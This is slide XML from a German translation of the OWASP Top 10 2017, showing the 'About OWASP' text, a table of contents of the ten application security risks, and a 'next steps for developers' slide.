                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> für Anwendungs-</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="de-DE" sz="900" b="1" dirty="0" err="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>siche</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>rheit</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6" name="Textplatzhalter 5"/>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+E</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Titel 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="75600"/>
            <a:ext cx="5486400" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Nächste Schritte für </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Software-Entwickler</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19252D53-D1BD-49D9-B2FA-F52853EFCB5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143635" y="3167167"/>
            <a:ext cx="1034404" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Anwendungs-sicherheits-anforderungen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{101040FE-B986-4469-A5F9-41A759396C27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130051" y="6512432"/>
            <a:ext cx="1073874" cy="466281"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="444500">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sicherer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="900" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Entwicklungs-zyklus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC02598A-C78E-EF45-8E7E-525E6B704E1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130051" y="4252892"/>
            <a:ext cx="1034404" cy="466281"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="444500">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Anwendungs-sicherheits-architektur</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561339283"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939600"/>
          <a:ext cx="3352800" cy="7566033"/>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31407">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Inhaltsverzeichnis</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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228593">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lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>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62961330"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="939600"/>
          <a:ext cx="3427200" cy="7567200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3427200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="347227">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Über </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</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219973">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pP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Das</a:t>
                      </a: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Open Web </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="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Application</a:t>
                      </a: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Security Project (OWASP) ist eine offene</a:t>
                      </a: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Community. OWASP möchte Organisationen in die Lage versetzen, sichere und vertrauenswürdige Anwendungen zu entwickeln, zu kaufen und zu betreiben. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pP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Von OWASP kann man folgendes erwarten; stets frei verfügbar und jedermann zugänglich:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="87313" lvl="0" indent="-87313" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200"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Werkzeuge-</a:t>
                      </a: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und Standards für sichere Anwendungen.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="87313" lvl="0" indent="-87313" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pP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Bücher zu den Themen Prüfungen, Entwicklung und Quellcodeanalyse im Bereich der Anwendungssicherheit.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="87313" lvl="0" indent="-87313" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pP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Vorträge und </a:t>
                      </a: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4"/>
                        </a:rPr>
                        <a:t>Videos</a:t>
                      </a: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p>
                    <a:p>
                      <a:pPr marL="87313" marR="0" lvl="0" indent="-87313" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pP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„Cheat </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="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sheets</a:t>
                      </a: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zu vielen sicherheitsrelevanten</a:t>
                      </a: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Themen.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="87313" marR="0" lvl="0" indent="-87313" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pP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Standard Security-Controls und Programm-Bibliotheken.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="87313" marR="0" lvl="0" indent="-87313" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pP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rPr>
                        <a:t>Lokale „Chapter“ auf der ganzen Welt</a:t>
                      </a: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und </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1"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Stammtische</a:t>
                      </a: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7313" lvl="0" indent="-87313" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pP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Neueste Forschung.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="87313" lvl="0" indent="-87313" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pP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Große und häufige </a:t>
                      </a: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rPr>
                        <a:t>Konferenzen auf der ganzen Welt</a:t>
                      </a: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7313" lvl="0" indent="-87313" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pP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Mailinglisten. </a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE"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lvl="0" indent="0" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Alle Informationen auf </a:t>
                      </a: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https://www.owasp.org</a:t>
                      </a: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bzw. </a:t>
                      </a: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https://www.owasp.de</a:t>
                      </a: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endParaRPr lang="de-DE" sz="950" b="0" i="0" u="sng"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Alle OWASP Werkzeuge,</a:t>
                      </a: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Dokumente, Videos, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="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Präsen-tationen</a:t>
                      </a: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und Chapter sind frei verfügbar und stehen jedem offen, der Anwendungssicherheit weiterentwickeln möchte. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pP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Mangelnde Anwendungssicherheit begreifen wir als ein personen-, prozess- und technologie-bezogenes Problem, da die meisten wirksamen Ansätze für Anwendungs-sicherheit Verbesserungen in diesen Feldern erfordern.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pP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 ist eine neue Art von Organisation. Wir unterliegen keinem kommerziellen Druck. Das erlaubt uns </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="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unvorein</a:t>
                      </a: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-genommene</a:t>
                      </a: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praktikable und kosteneffiziente Informationen über Anwendungssicherheit bereitzustellen. </a:t>
                      </a:r>
                      <a:endPar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 ist nicht von Dritten abhängig, wenngleich wir</a:t>
                      </a:r>
                      <a:b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die sachkundige </a:t>
                      </a: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Verwendung freier und kommerzieller Technologien unterstützen. OWASP erstellt viele unterschiedliche Materialien auf Basis eines </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="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kollaborativen</a:t>
                      </a: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transparenten und offenen Ansatzes. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pP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Die</a:t>
                      </a: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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="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Foundation</a:t>
                      </a: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ist die gemeinnützige Organisation, die </a:t>
                      </a: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den langfristigen Erfolg des Projektes sicher stellt. </a:t>
                      </a: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Fast</a:t>
                      </a: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jeder bei OWASP ist ehrenamtlich tätig. Das schließt das Board, Chapter- und Projekt-Leiter, sowie Mitglieder ein. </a:t>
                      </a:r>
                      <a:b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Wir unterstützen innovative Sicherheitsforschung mit Spenden, Förderungen und Infrastruktur.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE"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de-DE" sz="950" b="1"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Machen Sie mit!</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea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I</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titel 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Inhalt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2469242765"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1278000"/>
          <a:ext cx="3383280" cy="6896212"/>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val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="384464">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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Über OWASP	………………………………</a:t>
                      </a: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1</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b="1"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D</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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Vorwort der deutschen Version</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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2</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1"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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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Vorwort	…...………..………………...………</a:t>
                      </a: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3</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1"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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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Einleitung	…………..……………….……..…</a:t>
                      </a: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4</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b="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1"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N</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="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Neuerungen	.……………..………….…..…..</a:t>
                      </a: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5</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1"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Risiko</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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Sicherheitsrisiken für Anwendungen	…..…</a:t>
                      </a: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6</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28756">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50" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>T10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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50" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-	OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10 Risiken für die       </a:t>
                      </a:r>
                    </a:p>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dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>  			Anwendungssicherheit </a:t>
                      </a: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t>– 2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>017	...…….……</a:t>
                      </a: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7</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A1:2017</a:t>
                      </a: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de-DE" sz="950" kern="1200" noProof="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Injection</a:t>
                      </a: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8</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A2:2017</a:t>
                      </a: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Fehler in der</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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Au</a:t>
                      </a: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thentifizierung	…………...</a:t>
                      </a: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9</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A3:2017</a:t>
                      </a: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Verlust der Vertraulichkeit sensibler Daten</a:t>
                      </a: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10</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A4:2017</a:t>
                      </a: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XML </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" kern="1200" noProof="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External</a:t>
                      </a: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kern="1200" noProof="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Entities</a:t>
                      </a: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(XXE) 	……………...</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE"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11</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A5:2017</a:t>
                      </a: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Fehler in der Zugriffskontrolle …………….</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE"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12</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A6:2017</a:t>
                      </a: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Sicherheitsrelevante Fehlkonfiguration	…...</a:t>
                      </a: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13</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A7:2017</a:t>
                      </a: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Cross-Site Scripting (XSS) 	….……………..</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE"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14</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A8:2017</a:t>
                      </a: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Unsichere Deserialisierung	……...…………</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE"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15</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428756">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A9:2017</a:t>
                      </a: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Nutzung von Komponenten mit bekannten</a:t>
                      </a:r>
                      <a:b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Schwachstellen	..……………………………</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE"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16</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A10:2017</a:t>
                      </a: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Unzureichendes </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" kern="1200" noProof="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Logging</a:t>
                      </a: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&amp; Monitoring	.…..</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE"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17</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1"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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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Nächste Schritte für Software-Entwickler	…</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="95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18</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1"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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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Nächste Schritte für Sicherheitstester	.…....</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="95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19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1"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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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Nächste Schritte für Organisationen	.…......</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="95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31" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>20</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a:t>
                      </a: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Nächste Schritte für Anwendungs-</a:t>
                      </a:r>
                      <a:b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Verantwortliche	…………………………......</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE"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32" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>21</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a:t>
                      </a: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Anmerkungen zum Risikobegriff	……..……</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE"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33" action="ppaction://hlinksldjump"/>
